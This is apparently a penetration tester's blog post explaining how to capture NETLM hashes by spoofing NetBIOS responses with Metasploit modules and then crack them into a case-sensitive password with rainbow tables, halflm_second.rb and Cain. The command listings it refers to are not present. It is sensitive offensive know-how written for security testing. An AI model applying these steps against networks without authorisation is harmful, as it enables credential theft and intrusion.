The information within this post is not new and there will be many other posts that cover similar material. However after having had a number of conversations with other pen testers it is not always something that is utilised during testing. For that reason I decided that this was something that I wanted to cover as it is cheap and cheerful and normally results in a win!
So as if LM hashing wasn’t bad enough it makes things 10x easier if we control the challenge on a NETLM hash, fortunately Metasploit has a module for this, auxiliary/server/capture/smb. This module will basically negotiate the authentication request that comes to your server on SMB and use a preset challenge seed. Now all we need to do is get clients diverted to our listening module and were good to go.
Again Metasploit provides a module to help us divert requests to our server, this time to spoof NetBIOS requests. We will use auxiliary/spoof/nbns/nbns_response. This module basically responds to any NetBIOS broadcast request. This is perfect as now we can divert any bad (mistyped server names or shares) request to our SMB module and negotiate a NETLM/NETNTLM hash.
So let’s set up the jobs:
Now we wait for either legacy config calling old mapped drives or admins/users calling shares and falling to type the name correctly.
Waiting……….. And boom a hit!
Now we have got an NTLM and LM challenge hash to break.
Fortunately this can all be done with free tools including the rainbow tables that can be downloaded at http://www.freerainbowtables.com.
The password can be deciphered using 3 steps:
- Break the first 7 characters with rainbow tables.
- Break the second 7 characters with a selection of scripts.
- Test the known uppercase LM password against the NTLM hash to get the actual password case sensitive.
Cracking the first part of the password
Using rcracki_mt and the rainbow tables it is possible to crack the first 7 characters of the password. The first 16 characters in the LM hash make up the first part of the password and should be passed to rcracki_mt as per below while also feeding in the location of the rainbow tables:
We can see that the first 7 charaters of the password are TRUSTNO
Cracking the second part of the password
We will use Metasploits halflm_second.rb script with the following flags:
- -n the full LM hash
- -p the known first part of the password from the rcracki_mt
- -s the seed that we preset within the SMB Metasploit module.
Awesome so now we have the full password TRUSTNO11 but its all in uppercase so we still wouldnt be able to login on the console or use it else where such as database access etc.
Returning case-sensitive to the password
Cain is our friend for this one…. although there are other methods such as using john we will use Cain’s test password function. The SMB Metasploit module spits out the hashes collected in two formats one ready for john and one read for Cain. Therefore all we need to do is upload the Cain file to Cain and then test the password with the know uppercase version gathered in the previous step.
As you can see under NT Password we have the actual password Trustno11. We have now possibly found a way into a network where there were no other known vulnerabilities. Whoop Whoop!! WIN!